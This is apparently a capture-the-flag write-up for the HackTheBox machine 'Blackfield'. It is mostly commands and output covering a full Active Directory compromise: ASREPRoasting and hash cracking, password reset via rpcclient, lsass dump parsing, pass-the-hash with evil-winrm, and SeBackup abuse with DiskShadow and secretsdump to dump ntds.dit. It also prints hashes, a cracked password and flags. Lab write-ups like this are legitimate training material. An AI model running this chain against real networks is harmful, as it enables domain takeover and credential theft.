Information
Box
Write-up
Overview
TL;DR :
Install tools used in this WU on BlackArch Linux:
$ pacman -S nmap smbclient impacket python-pypykatz evil-winrm
Network enumeration
Port & service discovery with nmap :
# Nmap 7.80 scan initiated Thu Sep 17 22:39:53 2020 as: nmap -sSVC -p- -oA nmap_full -v 10.10.10.192
Nmap scan report for 10.10.10.192
Host is up (0.026s latency).
Not shown: 65527 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-09-18 03:48:25Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=9/17%Time=5F63CA20%P=x86_64-unknown-linux-gnu%r
SF:(DNSVersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07ver
SF:sion\x04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h06m19s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-09-18T03:50:43
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep 17 22:45:02 2020 -- 1 IP address (1 host up) scanned in 308.41 seconds
It seems we have here a domain controller with hostname DC01.
Edit /etc/hosts
to add the local domain:
10.10.10.192 backfield.local
SMB enumeration
Let's find some some shares:
$ smbclient -L //10.10.10.192
Enter WORKGROUP\noraj's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
There are two non-default shares:
One is not accessible but the other is:
$ smbclient //10.10.10.192/forensic
Enter WORKGROUP\noraj's password:
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \> ^C
$ smbclient //10.10.10.192/profiles$
Enter WORKGROUP\noraj's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jun 3 18:47:12 2020
.. D 0 Wed Jun 3 18:47:12 2020
AAlleni D 0 Wed Jun 3 18:47:11 2020
ABarteski D 0 Wed Jun 3 18:47:11 2020
ABekesz D 0 Wed Jun 3 18:47:11 2020
ABenzies D 0 Wed Jun 3 18:47:11 2020
ABiemiller D 0 Wed Jun 3 18:47:11 2020
AChampken D 0 Wed Jun 3 18:47:11 2020
ACheretei D 0 Wed Jun 3 18:47:11 2020
...
Those folders look like people's profile, but there are three folders not
starting with an uppercase letter that doesn't look like a name.
audit2020
support
svc_backup
We can save all profiles to a file:
$ printf %s 'dir' | smbclient //10.10.10.192/profiles $ '' | sed '1,3d;$d' | cut -d ' ' -f 3 -s > profiles.txt
As we know from nmap that the is Kerberos running, let's try ASREPRoast.
The ASREPRoast attack looks for users without Kerberos pre-authentication
required attribute (DONT_REQ_PREAUTH).
Ref. HackTricks - ASREPRoast
Then Impacket script GetNPUsers
allow to check if Kerberos pre-auth
is enabled for those accounts and extract their password hash:
$ GetNPUsers.py blackfield.local/ -usersfile profiles.txt -outputfile hash.txt -dc-ip 10.10.10.192 -format john
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
...
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
...
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
...
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Only support had is hash extracted.
$ cat hash.txt
$krb5asrep$support@BLACKFIELD.LOCAL:149b486205f9a8d069335550278e2933$0bfbb61c0a3af8cce3d8cd7f6584f411d9a5ac4053cdd802feadb914de2f9e5efe5f636a4ab76cca735f40754868ec140c6ed0d76ce0fc11891e17f518c5611ad1fb2e0d718f5d48a8c84fb0065e430755c9e6ee533ae52a7294b4b1132d20efc948369602dad416f819d48b0f9845268567c91ee02945d237f188162ebf0f43c7bc279ba887abf229f70319b8204ce4266d1bc98f0ce93bf28f72c1b517ab04f24db30e447085dbc156b8e5a2d8c06885e79c851b928d11975cef973a27f36169183ec240fcaca260996113052274be45c7332b202663a43516a08295f7bc25dabf07f3d86153167190e511be5d16a6cdd1ae94
Now we can crack it with John the Ripper :
$ john hash.txt -w=/usr/share/wordlists/passwords/rockyou.txt --format=krb5asrep-aes-opencl
$ john hash.txt --show
$krb5asrep$support@BLACKFIELD.LOCAL:#00^BlackKnight
1 password hash cracked, 0 left
RPC enumeration
We can know make use of the freshly discovered credentials to launch an
authenticated RPC scan to find domain users.
$ rpcclient -U support -W backfield.local 10.10.10.192
Enter BACKFIELD.LOCAL\support's password:
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[BLACKFIELD764430] rid:[0x451]
user:[BLACKFIELD538365] rid:[0x452]
...
user:[BLACKFIELD438814] rid:[0x584]
user:[svc_backup] rid:[0x585]
user:[lydericlefebvre] rid:[0x586]
We can see lydericlefebvre
, a new account we didn't see earlier.
Now let's list the domain groups:
$ rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
Those are only default groups. Let's check info about the special accounts we
have.
$ rpcclient $> queryuser 0x586
User Name : lydericlefebvre
Full Name : Lydéric aas. Lefebvre
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description : @lydericlefebvre - VM Creator
Workstations:
Comment :
Remote Dial :
Logon Time : Thu, 01 Jan 1970 01:00:00 CET
Logoff Time : Thu, 01 Jan 1970 01:00:00 CET
Kickoff Time : Thu, 14 Sep 30828 04:48:05 CEST
Password last set Time : Fri, 28 Feb 2020 23:33:36 CET
Password can change Time : Sat, 29 Feb 2020 23:33:36 CET
Password must change Time: Thu, 14 Sep 30828 04:48:05 CEST
unknown_2[0..31]...
user_rid : 0x586
group_rid: 0x201
acb_info : 0x00000210
fields_present: 0x00ffffff
logon_divs: 168
bad_password_count: 0x00000000
logon_count: 0x00000000
padding1[0..7]...
logon_hrs[0..21]...
I don't know if this will be useful later but we now known that lydericlefebvre
could be able to create VM. There was nothing special about the other accounts.
Elevation of Privilege (EoP): from support to audit2020
In case our account is privileged we can try to change other account password.
chgpasswd
won't help us as it requires the old password. But setuserinfo
doesn't.
rpcclient $> setuserinfo
Usage: setuserinfo username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
The level is defined from USER_INFORMATION_CLASS .
rpcclient $> setuserinfo audit2020 23 Noraj123!
rpcclient $> setuserinfo svc_backup 23 Noraj123!
result: NT_STATUS_ACCESS_DENIED
result was NT_STATUS_ACCESS_DENIED
rpcclient $> setuserinfo lydericlefebvre 23 Noraj123!
result: NT_STATUS_ACCESS_DENIED
result was NT_STATUS_ACCESS_DENIED
Elevation of Privilege (EoP): from audit2020 to svc_backup
With support or unauthenticated we were not able to list the content of the
forensic share but we can with audit2020. So let's dump all we can:
$ mkdir -p Shares/forensic
$ cd Shares/forensic
$ smbclient //10.10.10.192/forensic -U audit2020 -W blackfield.local Noraj123!
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 14:03:16 2020
.. D 0 Sun Feb 23 14:03:16 2020
commands_output D 0 Sun Feb 23 19:14:37 2020
memory_analysis D 0 Thu May 28 22:28:33 2020
tools D 0 Sun Feb 23 14:39:08 2020
7846143 blocks of size 4096. 4156574 blocks available
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
PS: a more clever approach would be to avoid dumping tools/
which will take a
lot of time and space for generic binaries we do not need.
In memory_analissy
there is a lsass
dump.
$ cd memory_analysis
$ unzip lsass.zip
Archive: lsass.zip
inflating: lsass.DMP
Then we can use pypykatz , Python implementation of Mimikatz, to try to dump
hashes from here.
$ pypykatz lsa minidump lsass.DMP > lsass_dump.txt
INFO:root:Parsing file lsass.DMP
So we obtained those two SHA1 hashes:
svc_backup:463c13a9a31fc3252c68ba0a44f0221626a33e5c
Administrator:db5c89a961644f0978b4b69a4d2a2239d7886368
And NT hashes:
svc_backup:9658d1d1dcd9250115e2205d9f48400d
Administrator:7f1e4ff8c6a8e6b6fcae2d9c0572cd62
We can use evil-winrm to make a pass the hash (PtH) authentication
and gain PowerShell acess:
$ evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> gc ../Desktop/user.txt
0d1d70d4c5439a332577fcbc2bcbed15
*Evil-WinRM* PS C:\Users\svc_backup\Documents>
Elevation of Privilege (EoP): from svc_backup to root
Let's check what we can do with this account:
*Evil-WinRM* PS C:\Users\svc_backup\Documents> net user svc_backup
User name svc_backup
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2020 10:54:48 AM
Password expires Never
Password changeable 2/24/2020 10:54:48 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 9/20/2020 9:38:19 PM
Logon hours allowed All
Local Group Memberships *Backup Operators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Our account have way to much power!
SeBackup & SeRestore privileges (from the Backup Operators group) allow us to
set permissionand ownership on each file & folder.
References:
Normally we shouldn't be able to access ntds.dit (Active Directory database)
but since SeBackup & SeRestore privileges let us set any permission on
any file we will be able to fix that.
Let's auto-gives us full control on ntds.dit
.
$ntds_file = "C:\Windows\NTDS\ntds.dit"
$acl_ntds = Get-Acl $ntds_file
$domain = "blackfield.local"
$account = "svc_backup"
$access_rule = New-Object System.Security.AccessControl.FileSystemAccessRule( " $domain \ $account " , "FullControl" , "Allow" )
$acl_ntds.SetAccessRule ( $access_rule )
$acl_ntds | Set-Acl $ntds_file
Get-acl $ntds_file | select - expand accesstostring
BLACKFIELD\svc_backup Allow FullControl
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullContro
Now we'll use DiskShadow
to make a shadow copy of the ntds.
DiskShadow.exe is a tool that exposes the functionality offered by the Volume Shadow Copy Service (VSS). By default, DiskShadow uses an interactive command interpreter similar to that of DiskRaid or DiskPart. DiskShadow also includes a scriptable mode.
Microsoft Docs
Let's prepapre the copy script (diskshadow.txt
) to run DiskShadow
in script
mode.
set context persistent nowriters#
add volume c: alias noraj#
create#
expose %noraj% x:#
exec "cmd.exe" /c copy x:\windows\ntds\ntds.dit c:\Users\svc_backup\Videos\ntds.dit#
delete shadows volume %noraj% #
reset#
Then we can use evil-winrm native upload feature.
*Evil-WinRM* PS C:\Users\svc_backup\Videos> upload /home/noraj/CTF/HackTheBox/machines/Blackfield/diskshadow.txt
Info: Uploading /home/noraj/CTF/HackTheBox/machines/Blackfield/diskshadow.txt to C:\Users\svc_backup\Videos\diskshadow.txt
Data: 268 bytes of 268 bytes copied
Info: Upload successful!
And then call DiskShadow
.
*Evil-WinRM* PS C:\Users\svc_backup> diskshadow.exe /s C:\Users\svc_backup\Videos\diskshadow.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 9/21/2020 12:12:50 AM
-> set context persistent nowriters
-> add volume c: alias noraj
-> create
Alias noraj for shadow ID {eef6f0be-3c60-4e69-985d-3bc400a24ff1} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {12b5d80f-4368-4727-a02b-1b22f5e020ef} set as environment variable.
Querying all shadow copies with the shadow copy set ID {12b5d80f-4368-4727-a02b-1b22f5e020ef}
* Shadow copy ID = {eef6f0be-3c60-4e69-985d-3bc400a24ff1} %noraj%
- Shadow copy set: {12b5d80f-4368-4727-a02b-1b22f5e020ef} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 9/21/2020 12:12:51 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %noraj% z:
-> %noraj% = {eef6f0be-3c60-4e69-985d-3bc400a24ff1}
The shadow copy was successfully exposed as z:\.
-> exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\Users\svc_backup\Videos\ntds.dit
The script file name is not valid.
EXEC <file.cmd>
Execute a script file on the local machine.
This command is used to duplicate or restore data as part of
a backup or restore sequence.
As I got issues with the exec
command I manually copied the file afterward:
*Evil-WinRM* PS C:\Users\svc_backup\Videos> cp x:\windows\ntds\ntds.dit .
Then we can also dump the SYSTEM hive:
*Evil-WinRM* PS C:\Users\svc_backup\Videos> reg save hklm\system system.hive
Again, we can use evil-winrm native download feature.
*Evil-WinRM* PS C:\Users\svc_backup\Videos> download ntds.dit /home/noraj/CTF/HackTheBox/machines/Blackfield/ntds.dit
Info: Downloading C:\Users\svc_backup\Videos\ntds.dit to /home/noraj/CTF/HackTheBox/machines/Blackfield/ntds.dit
Info: Download successful!
Finally we can use secretsdump
from Impacket to extract the hashes.
$ secretsdump.py -ntds ntds.dit -system system.hive LOCAL
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:65557f7ad03ac340a7eb12b9462f80d6:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:c95ac94a048e7c29ac4b4320d7c9d3b5:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
BLACKFIELD.local\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD538365:1106:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD189208:1107:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD404458:1108:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD706381:1109:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
...
Again a PtH using evil-winrm with Administrator account.
$ evil-winrm -u Administrator -H 184fb5e5178480be64824d4cd53b99ee -i 10.10.10.192
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> gc ../Desktop/root.txt
511fa0e63117cc3e746a523d0b5fd0b8